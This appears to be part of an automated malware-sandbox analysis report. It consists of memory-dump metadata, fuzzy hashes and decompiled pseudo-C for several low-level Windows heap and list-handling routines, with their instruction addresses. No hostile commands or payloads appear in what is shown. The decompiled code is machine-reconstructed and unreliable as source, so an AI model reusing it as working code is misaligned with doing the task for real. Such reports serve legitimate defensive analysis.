                        0x02bcfe26
                        0x02bcfdd8
                        0x02bcfddb
                        0x02bcfddd
                        0x02bcfde0
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                        • Instruction ID: e36b7e9c45b26054873a18f925ece6d1a22331c2a24374d98a04582d804c09ac
                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                        • Instruction Fuzzy Hash: 812179B2A00A41DBC731CF0AC540FB6F7E6EB94B10F2481EEE9498BA11D730AD00DB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E02B99240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t33;
                        				intOrPtr _t37;
                        				intOrPtr _t41;
                        				intOrPtr* _t46;
                        				void* _t48;
                        				intOrPtr _t50;
                        				intOrPtr* _t60;
                        				void* _t61;
                        				intOrPtr _t62;
                        				intOrPtr _t65;
                        				void* _t66;
                        				void* _t68;
                        
                        				_push(0xc);
                        				_push(0x2c6f708);
                        				E02BED08C(__ebx, __edi, __esi);
                        				_t65 = __ecx;
                        				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                        				if( *(__ecx + 0x24) != 0) {
                        					_push( *(__ecx + 0x24));
                        					E02BD95D0();
                        					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                        				}
                        				L6();
                        				L6();
                        				_push( *((intOrPtr*)(_t65 + 0x28)));
                        				E02BD95D0();
                        				_t33 =  *0x2c884c4; // 0x0
                        				L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                        				_t37 =  *0x2c884c4; // 0x0
                        				L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                        				_t41 =  *0x2c884c4; // 0x0
                        				E02BB2280(L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x2c886b4);
                        				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                        				_t46 = _t65 + 0xe8;
                        				_t62 =  *_t46;
                        				_t60 =  *((intOrPtr*)(_t46 + 4));
                        				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                        					_t61 = 3;
                        					asm("int 0x29");
                        					_push(_t65);
                        					_t66 = _t61;
                        					_t23 = _t66 + 0x14; // 0x8df8084c
                        					_push( *_t23);
                        					E02BD95D0();
                        					_t24 = _t66 + 0x10; // 0x89e04d8b
                        					_push( *_t24);
                        					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                        					_t48 = E02BD95D0();
                        					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                        					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                        					return _t48;
                        				} else {
                        					 *_t60 = _t62;
                        					 *((intOrPtr*)(_t62 + 4)) = _t60;
                        					 *(_t68 - 4) = 0xfffffffe;
                        					E02B99325();
                        					_t50 =  *0x2c884c4; // 0x0
                        					return E02BED0D1(L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                        				}
                        			}















                        0x02b99240
                        0x02b99242
                        0x02b99247
                        0x02b9924c
                        0x02b9924e
                        0x02b99255
                        0x02b99257
                        0x02b9925a
                        0x02b9925f
                        0x02b9925f
                        0x02b99266
                        0x02b99271
                        0x02b99276
                        0x02b99279
                        0x02b9927e
                        0x02b99295
                        0x02b9929a
                        0x02b992b1
                        0x02b992b6
                        0x02b992d7
                        0x02b992dc
                        0x02b992e0
                        0x02b992e6
                        0x02b992e8
                        0x02b992ee
                        0x02b99332
                        0x02b99333
                        0x02b99337
                        0x02b99338
                        0x02b9933a
                        0x02b9933a
                        0x02b9933d
                        0x02b99342
                        0x02b99342
                        0x02b99345
                        0x02b99349
                        0x02b9934e
                        0x02b99352
                        0x02b99357
                        0x02b992f4
                        0x02b992f4
                        0x02b992f6
                        0x02b992f9
                        0x02b99300
                        0x02b99306
                        0x02b99324
                        0x02b99324

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 38dc40c5ef69e7f70722b9ecf4e4c531b576ee09f66aafb7c7ec2698e76bfb99
                        • Instruction ID: 9e96f6e731d97b3ad716d0fff965f50fa89563f6fe354379ee6860ab88f22519
                        • Opcode Fuzzy Hash: 38dc40c5ef69e7f70722b9ecf4e4c531b576ee09f66aafb7c7ec2698e76bfb99
                        • Instruction Fuzzy Hash: 3D215132480A40DFC762EF18CA50F59B7BAFF04704F5586ACE04A87AA1CB74E951DF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E02BCB390(void* __ecx, intOrPtr _a4) {
                        				signed int _v8;
                        				signed char _t12;
                        				signed int _t16;
                        				signed int _t21;
                        				void* _t28;
                        				signed int _t30;
                        				signed int _t36;
                        				signed int _t41;
                        
                        				_push(__ecx);
                        				_t41 = _a4 + 0xffffffb8;
                        				E02BB2280(_t12, 0x2c88608);
                        				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                        				asm("sbb edi, edi");
                        				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                        				_v8 = _t36;
                        				asm("lock cmpxchg [ebx], ecx");
                        				_t30 = 1;
                        				if(1 != 1) {
                        					while(1) {
                        						_t21 = _t30 & 0x00000006;
                        						_t16 = _t30;
                        						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                        						asm("lock cmpxchg [edi], esi");
                        						if(_t16 == _t30) {
                        							break;
                        						}
                        						_t30 = _t16;
                        					}
                        					_t36 = _v8;
                        					if(_t21 == 2) {
                        						_t16 = E02BD00C2(0x2c88608, 0, _t28);
                        					}
                        				}
                        				if(_t36 != 0) {
                        					_t16 = L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                        				}
                        				return _t16;
                        			}











                        0x02bcb395
                        0x02bcb3a2
                        0x02bcb3a5
                        0x02bcb3aa
                        0x02bcb3b2
                        0x02bcb3ba
                        0x02bcb3bd
                        0x02bcb3c0
                        0x02bcb3c4
                        0x02bcb3c9
                        0x02c0a3e9
                        0x02c0a3ed
                        0x02c0a3f0
                        0x02c0a3ff
                        0x02c0a403
                        0x02c0a409
                        0x00000000
                        0x00000000
                        0x02c0a40b
                        0x02c0a40b
                        0x02c0a40f
                        0x02c0a415
                        0x02c0a423
                        0x02c0a423
                        0x02c0a415
                        0x02bcb3d1
                        0x02bcb3e8
                        0x02bcb3e8
                        0x02bcb3d9

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2dc1c4a086b7cd3f57aa55381e02a33fdceadd11c39914fc02e917b0744d6751
                        • Instruction ID: 447c53ebf5796c0ec1c39c0e112b900642bff02b5266544ffbbd88746703a4d4
                        • Opcode Fuzzy Hash: 2dc1c4a086b7cd3f57aa55381e02a33fdceadd11c39914fc02e917b0744d6751
                        • Instruction Fuzzy Hash: 681144777112149BCB29DA258D82A6F7397EBC5334B38826DDE16DB7C0DA31AC02C694
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E02C24257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                        				intOrPtr* _t18;
                        				intOrPtr _t24;
                        				intOrPtr* _t27;
                        				intOrPtr* _t30;
                        				intOrPtr* _t31;
                        				intOrPtr _t33;
                        				intOrPtr* _t34;
                        				intOrPtr* _t35;
                        				void* _t37;
                        				void* _t38;
                        				void* _t39;
                        				void* _t43;
                        
                        				_t39 = __eflags;
                        				_t35 = __edi;
                        				_push(8);
                        				_push(0x2c708d0);
                        				E02BED08C(__ebx, __edi, __esi);
                        				_t37 = __ecx;
                        				E02C241E8(__ebx, __edi, __ecx, _t39);
                        				E02BAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                        				_t18 = _t37 + 8;
                        				_t33 =  *_t18;
                        				_t27 =  *((intOrPtr*)(_t18 + 4));
                        				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                        					L8:
                        					_push(3);
                        					asm("int 0x29");
                        				} else {
                        					 *_t27 = _t33;
                        					 *((intOrPtr*)(_t33 + 4)) = _t27;
                        					_t35 = 0x2c887e4;
                        					_t18 =  *0x2c887e0; // 0x0
                        					while(_t18 != 0) {
                        						_t43 = _t18 -  *0x2c85cd0; // 0xffffffff
                        						if(_t43 >= 0) {
                        							_t31 =  *0x2c887e4; // 0x0
                        							_t18 =  *_t31;
                        							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                        								goto L8;
                        							} else {
                        								 *0x2c887e4 = _t18;
                        								 *((intOrPtr*)(_t18 + 4)) = _t35;
                        								L02B97055(_t31 + 0xfffffff8);
                        								_t24 =  *0x2c887e0; // 0x0
                        								_t18 = _t24 - 1;
                        								 *0x2c887e0 = _t18;
                        								continue;
                        							}
                        						}
                        						goto L9;
                        					}
                        				}
                        				L9:
                        				__eflags =  *0x2c85cd0;
                        				if( *0x2c85cd0 <= 0) {
                        					L02B97055(_t37);
                        				} else {
                        					_t30 = _t37 + 8;
                        					_t34 =  *0x2c887e8; // 0x0
                        					__eflags =  *_t34 - _t35;
                        					if( *_t34 != _t35) {
                        						goto L8;
                        					} else {
                        						 *_t30 = _t35;
                        						 *((intOrPtr*)(_t30 + 4)) = _t34;
                        						 *_t34 = _t30;
                        						 *0x2c887e8 = _t30;
                        						 *0x2c887e0 = _t18 + 1;
                        					}
                        				}
                        				 *(_t38 - 4) = 0xfffffffe;
                        				return E02BED0D1(L02C24320());
                        			}















                        0x02c24257
                        0x02c24257
                        0x02c24257
                        0x02c24259
                        0x02c2425e
                        0x02c24263
                        0x02c24265
                        0x02c24273
                        0x02c24278
                        0x02c2427c
                        0x02c2427f
                        0x02c24281
                        0x02c24287
                        0x02c242d7
                        0x02c242d7
                        0x02c242da
                        0x02c2428d
                        0x02c2428d
                        0x02c2428f
                        0x02c24292
                        0x02c24297
                        0x02c2429c
                        0x02c242a0
                        0x02c242a6
                        0x02c242a8
                        0x02c242ae
                        0x02c242b3
                        0x00000000
                        0x02c242ba
                        0x02c242ba
                        0x02c242bf
                        0x02c242c5
                        0x02c242ca
                        0x02c242cf
                        0x02c242d0
                        0x00000000
                        0x02c242d0
                        0x02c242b3
                        0x00000000
                        0x02c242a6
                        0x02c2429c
                        0x02c242dc
                        0x02c242dc
                        0x02c242e3
                        0x02c24309
                        0x02c242e5
                        0x02c242e5
                        0x02c242e8
                        0x02c242ee
                        0x02c242f0
                        0x00000000
                        0x02c242f2
                        0x02c242f2
                        0x02c242f4
                        0x02c242f7
                        0x02c242f9
                        0x02c24300
                        0x02c24300
                        0x02c242f0
                        0x02c2430e
                        0x02c2431f

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b082f9a86a8dd31948fac99cb99760ad9797f09e6faf7f26a07521386199062a
                        • Instruction ID: 47f8cd87ac52bb4dc7dee6564c0044cc817f044c7b7d107dec25cf25286472f5
                        • Opcode Fuzzy Hash: b082f9a86a8dd31948fac99cb99760ad9797f09e6faf7f26a07521386199062a
                        • Instruction Fuzzy Hash: 77216774A80A15CFCB28DF26D900B14BBF2FB85715BA4C7AAE1198B690DF31D595CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 34%
                        			E02BC2397(intOrPtr _a4) {
                        				void* __ebx;
                        				void* __ecx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed int _t11;
                        				void* _t19;
                        				void* _t25;
                        				void* _t26;
                        				intOrPtr _t27;
                        				void* _t28;
                        				void* _t29;
                        
                        				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                        				if( *0x2c8848c != 0) {
                        					L02BBFAD0(0x2c88610);
                        					if( *0x2c8848c == 0) {
                        						E02BBFA00(0x2c88610, _t19, _t27, 0x2c88610);
                        						goto L1;
                        					} else {
                        						_push(0);
                        						_push(_a4);
                        						_t26 = 4;
                        						_t29 = E02BC2581(0x2c88610, 0x2b750a0, _t26, _t27, _t28);
                        						E02BBFA00(0x2c88610, 0x2b750a0, _t27, 0x2c88610);
                        					}
                        				} else {
                        					L1:
                        					_t11 =  *0x2c88614; // 0x1
                        					if(_t11 == 0) {
                        						_t11 = E02BD4886(0x2b71088, 1, 0x2c88614);
                        					}
                        					_push(0);
                        					_push(_a4);
                        					_t25 = 4;
                        					_t29 = E02BC2581(0x2c88610, (_t11 << 4) + 0x2b75070, _t25, _t27, _t28);
                        				}
                        				if(_t29 != 0) {
                        					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                        					 *((char*)(_t29 + 0x40)) = 0;
                        				}
                        				return _t29;
                        			}















                        0x02bc23b0
                        0x02bc23b6
                        0x02bc2409
                        0x02bc2415
                        0x02c05ae9
                        0x00000000
                        0x02bc241b
                        0x02bc241b
                        0x02bc241d
                        0x02bc2427
                        0x02bc242e
                        0x02bc2430
                        0x02bc2430
                        0x02bc23b8
                        0x02bc23b8
                        0x02bc23b8
                        0x02bc23bf
                        0x02bc23fc
                        0x02bc23fc
                        0x02bc23c1
                        0x02bc23c3
                        0x02bc23d0
                        0x02bc23d8
                        0x02bc23d8
                        0x02bc23dc
                        0x02bc23de
                        0x02bc23e1
                        0x02bc23e1
                        0x02bc23ec

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 90f73ab1cec4b87d2c94f2eba972c40f90757a3f0a19bc5c54b935ad26571119
                        • Instruction ID: 75e596fca64d882bba6907037cc39bd24efefa72062f50cc85f0977f3e7d80e6
                        • Opcode Fuzzy Hash: 90f73ab1cec4b87d2c94f2eba972c40f90757a3f0a19bc5c54b935ad26571119
                        • Instruction Fuzzy Hash: D9112F327843045BD734963D9C90B26729DFFD0750F64C599FD02A7551C6B0D800CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E02C146A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                        				signed short* _v8;
                        				unsigned int _v12;
                        				intOrPtr _v16;
                        				signed int _t22;
                        				signed char _t23;
                        				short _t32;
                        				void* _t38;
                        				char* _t40;
                        
                        				_v12 = __edx;
                        				_t29 = 0;
                        				_v8 = __ecx;
                        				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                        				_t38 = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                        				if(_t38 != 0) {
                        					_t40 = _a4;
                        					 *_t40 = 1;
                        					E02BDF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                        					_t22 = _v12 >> 1;
                        					_t32 = 0x2e;
                        					 *((short*)(_t38 + _t22 * 2)) = _t32;
                        					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                        					_t23 = E02BCD268(_t38, 1);
                        					asm("sbb al, al");
                        					 *_t40 =  ~_t23 + 1;
                        					L02BB77F0(_v16, 0, _t38);
                        				} else {
                        					 *_a4 = 0;
                        					_t29 = 0xc0000017;
                        				}
                        				return _t29;
                        			}











                        0x02c146b7
                        0x02c146ba
                        0x02c146c5
                        0x02c146c8
                        0x02c146d0
                        0x02c146d4
                        0x02c146e6
                        0x02c146e9
                        0x02c146f4
                        0x02c146ff
                        0x02c14705
                        0x02c14706
                        0x02c1470c
                        0x02c14713
                        0x02c1471b
                        0x02c14723
                        0x02c14725
                        0x02c146d6
                        0x02c146d9
                        0x02c146db
                        0x02c146db
                        0x02c14732

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                        • Instruction ID: fedce59b2736565459ff27417022c9e299596259456c61f9bb635b5d2d83f690
                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                        • Instruction Fuzzy Hash: 9411C272904208BBC7159F6DD8809BEB7BAEF95314F1080AAF9848B351DA318D55D7A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 42%
                        			E02B9C962(char __ecx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t19;
                        				char _t22;
                        				intOrPtr _t26;
                        				intOrPtr _t27;
                        				char _t32;
                        				char _t34;
                        				intOrPtr _t35;
                        				intOrPtr _t37;
                        				intOrPtr* _t38;
                        				signed int _t39;
                        
                        				_t41 = (_t39 & 0xfffffff8) - 0xc;
                        				_v8 =  *0x2c8d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                        				_t34 = __ecx;
                        				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                        					_t26 = 0;
                        					E02BAEEF0(0x2c870a0);
                        					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                        					if(E02C1F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                        						L9:
                        						E02BAEB70(_t29, 0x2c870a0);
                        						_t19 = _t26;
                        						L2:
                        						_pop(_t35);
                        						_pop(_t37);
                        						_pop(_t27);
                        						return E02BDB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                        					}
                        					_t29 = _t34;
                        					_t26 = E02C1F1FC(_t34, _t32);
                        					if(_t26 < 0) {
                        						goto L9;
                        					}
                        					_t38 =  *0x2c870c0; // 0x0
                        					while(_t38 != 0x2c870c0) {
                        						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                        						_t38 =  *_t38;
                        						_v12 = _t22;
                        						if(_t22 != 0) {
                        							_t29 = _t22;
                        							 *0x2c8b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                        							_v12();
                        						}
                        					}
                        					goto L9;
                        				}
                        				_t19 = 0;
                        				goto L2;
                        			}


















                        0x02b9c96a
                        0x02b9c974
                        0x02b9c988
                        0x02b9c98a
                        0x02c07c9d
                        0x02c07c9f
                        0x02c07ca4
                        0x02c07cae
                        0x02c07cf0
                        0x02c07cf5
                        0x02c07cfa
                        0x02b9c992
                        0x02b9c996
                        0x02b9c997
                        0x02b9c998
                        0x02b9c9a3
                        0x02b9c9a3
                        0x02c07cb0
                        0x02c07cb7
                        0x02c07cbb
                        0x00000000
                        0x00000000
                        0x02c07cbd
                        0x02c07ce8
                        0x02c07cc5
                        0x02c07cc8
                        0x02c07cca
                        0x02c07cd0
                        0x02c07cd6
                        0x02c07cde
                        0x02c07ce4
                        0x02c07ce4
                        0x02c07cd0
                        0x00000000
                        0x02c07ce8
                        0x02b9c990
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f30041a3e80fb1b775375c5a3334c28d9cd70b2b5f5024362d088784312af248
                        • Instruction ID: 196d88de614cd81fd3d89740f2b5e08cd4fd95dcbd437a1906cfcfc6d1f32dae
                        • Opcode Fuzzy Hash: f30041a3e80fb1b775375c5a3334c28d9cd70b2b5f5024362d088784312af248
                        • Instruction Fuzzy Hash: E7112531700A029BDB14AF28CC95A2BF7E6BBC4714B200539F84283691EB20FD18DBC1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E02BD37F5(void* __ecx, intOrPtr* __edx) {
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t6;
                        				intOrPtr _t13;
                        				intOrPtr* _t20;
                        				intOrPtr* _t27;
                        				void* _t28;
                        				intOrPtr* _t29;
                        
                        				_t27 = __edx;
                        				_t28 = __ecx;
                        				if(__edx == 0) {
                        					E02BB2280(_t6, 0x2c88550);
                        				}
                        				_t29 = E02BD387E(_t28);
                        				if(_t29 == 0) {
                        					L6:
                        					if(_t27 == 0) {
                        						E02BAFFB0(0x2c88550, _t27, 0x2c88550);
                        					}
                        					if(_t29 == 0) {
                        						return 0xc0000225;
                        					} else {
                        						if(_t27 != 0) {
                        							goto L14;
                        						}
                        						L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                        						goto L11;
                        					}
                        				} else {
                        					_t13 =  *_t29;
                        					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                        						L13:
                        						_push(3);
                        						asm("int 0x29");
                        						L14:
                        						 *_t27 = _t29;
                        						L11:
                        						return 0;
                        					}
                        					_t20 =  *((intOrPtr*)(_t29 + 4));
                        					if( *_t20 != _t29) {
                        						goto L13;
                        					}
                        					 *_t20 = _t13;
                        					 *((intOrPtr*)(_t13 + 4)) = _t20;
                        					asm("btr eax, ecx");
                        					goto L6;
                        				}
                        			}











                        0x02bd37fa
                        0x02bd37fc
                        0x02bd3805
                        0x02bd3808
                        0x02bd3808
                        0x02bd3814
                        0x02bd3818
                        0x02bd3846
                        0x02bd3848
                        0x02bd384b
                        0x02bd384b
                        0x02bd3852
                        0x00000000
                        0x02bd3854
                        0x02bd3856
                        0x00000000
                        0x00000000
                        0x02bd3863
                        0x00000000
                        0x02bd3863
                        0x02bd381a
                        0x02bd381a
                        0x02bd381f
                        0x02bd386e
                        0x02bd386e
                        0x02bd3871
                        0x02bd3873
                        0x02bd3873
                        0x02bd3868
                        0x00000000
                        0x02bd3868
                        0x02bd3821
                        0x02bd3826
                        0x00000000
                        0x00000000
                        0x02bd3828
                        0x02bd382a
                        0x02bd3841
                        0x00000000
                        0x02bd3841

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c0b347c3ac05181b48a6ef18894420e1ec8fb955ef9f1a1b5f776b3a1820a7c7
                        • Instruction ID: 14e6ab85974064c6e8d2f7ae19496a51b0786656a5ff1144e77b545ebb54dab6
                        • Opcode Fuzzy Hash: c0b347c3ac05181b48a6ef18894420e1ec8fb955ef9f1a1b5f776b3a1820a7c7
                        • Instruction Fuzzy Hash: 8301D6B29816109BC3378B1A9940FA6BBE7DF85B6071540E9E8458B612EB32E801CFD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BC002D() {
                        				void* _t11;
                        				char* _t14;
                        				signed char* _t16;
                        				char* _t27;
                        				signed char* _t29;
                        
                        				_t11 = E02BB7D50();
                        				_t27 = 0x7ffe0384;
                        				if(_t11 != 0) {
                        					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        				} else {
                        					_t14 = 0x7ffe0384;
                        				}
                        				_t29 = 0x7ffe0385;
                        				if( *_t14 != 0) {
                        					if(E02BB7D50() == 0) {
                        						_t16 = 0x7ffe0385;
                        					} else {
                        						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        					}
                        					if(( *_t16 & 0x00000040) != 0) {
                        						goto L18;
                        					} else {
                        						goto L3;
                        					}
                        				} else {
                        					L3:
                        					if(E02BB7D50() != 0) {
                        						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					}
                        					if( *_t27 != 0) {
                        						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                        							goto L5;
                        						}
                        						if(E02BB7D50() != 0) {
                        							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        						}
                        						if(( *_t29 & 0x00000020) == 0) {
                        							goto L5;
                        						}
                        						L18:
                        						return 1;
                        					} else {
                        						L5:
                        						return 0;
                        					}
                        				}
                        			}








                        0x02bc0032
                        0x02bc0037
                        0x02bc0043
                        0x02c04b3a
                        0x02bc0049
                        0x02bc0049
                        0x02bc0049
                        0x02bc004e
                        0x02bc0053
                        0x02c04b48
                        0x02c04b5a
                        0x02c04b4a
                        0x02c04b53
                        0x02c04b53
                        0x02c04b5f
                        0x00000000
                        0x02c04b61
                        0x00000000
                        0x02c04b61
                        0x02bc0059
                        0x02bc0059
                        0x02bc0060
                        0x02c04b6f
                        0x02c04b6f
                        0x02bc0069
                        0x02c04b83
                        0x00000000
                        0x00000000
                        0x02c04b90
                        0x02c04b9b
                        0x02c04b9b
                        0x02c04ba4
                        0x00000000
                        0x00000000
                        0x02c04baa
                        0x00000000
                        0x02bc006f
                        0x02bc006f
                        0x00000000
                        0x02bc006f
                        0x02bc0069

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                        • Instruction ID: f2b478477de8f2b8f5babb45c0473c3802d67544debf955acefeeea72a5c879a
                        • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                        • Instruction Fuzzy Hash: EA112676205E80CFD737A728C984B3677D9EFC07A8F1A04E4DE04876D2DB28C941C660
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 94%
                        			E02BA766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                        				char _v8;
                        				void* _t22;
                        				void* _t24;
                        				intOrPtr _t29;
                        				intOrPtr* _t30;
                        				void* _t42;
                        				intOrPtr _t47;
                        
                        				_push(__ecx);
                        				_t36 =  &_v8;
                        				if(E02BCF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                        					L10:
                        					_t22 = 0;
                        				} else {
                        					_t24 = _v8 + __ecx;
                        					_t42 = _t24;
                        					if(_t24 < __ecx) {
                        						goto L10;
                        					} else {
                        						if(E02BCF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                        							goto L10;
                        						} else {
                        							_t29 = _v8 + _t42;
                        							if(_t29 < _t42) {
                        								goto L10;
                        							} else {
                        								_t47 = _t29;
                        								_t30 = _a16;
                        								if(_t30 != 0) {
                        									 *_t30 = _t47;
                        								}
                        								if(_t47 == 0) {
                        									goto L10;
                        								} else {
                        									_t22 = L02BB4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _t22;
                        			}










                        0x02ba7672
                        0x02ba767f
                        0x02ba7689
                        0x02ba76de
                        0x02ba76de
                        0x02ba768b
                        0x02ba7691
                        0x02ba7693
                        0x02ba7697
                        0x00000000
                        0x02ba7699
                        0x02ba76a8
                        0x00000000
                        0x02ba76aa
                        0x02ba76ad
                        0x02ba76b1
                        0x00000000
                        0x02ba76b3
                        0x02ba76b3
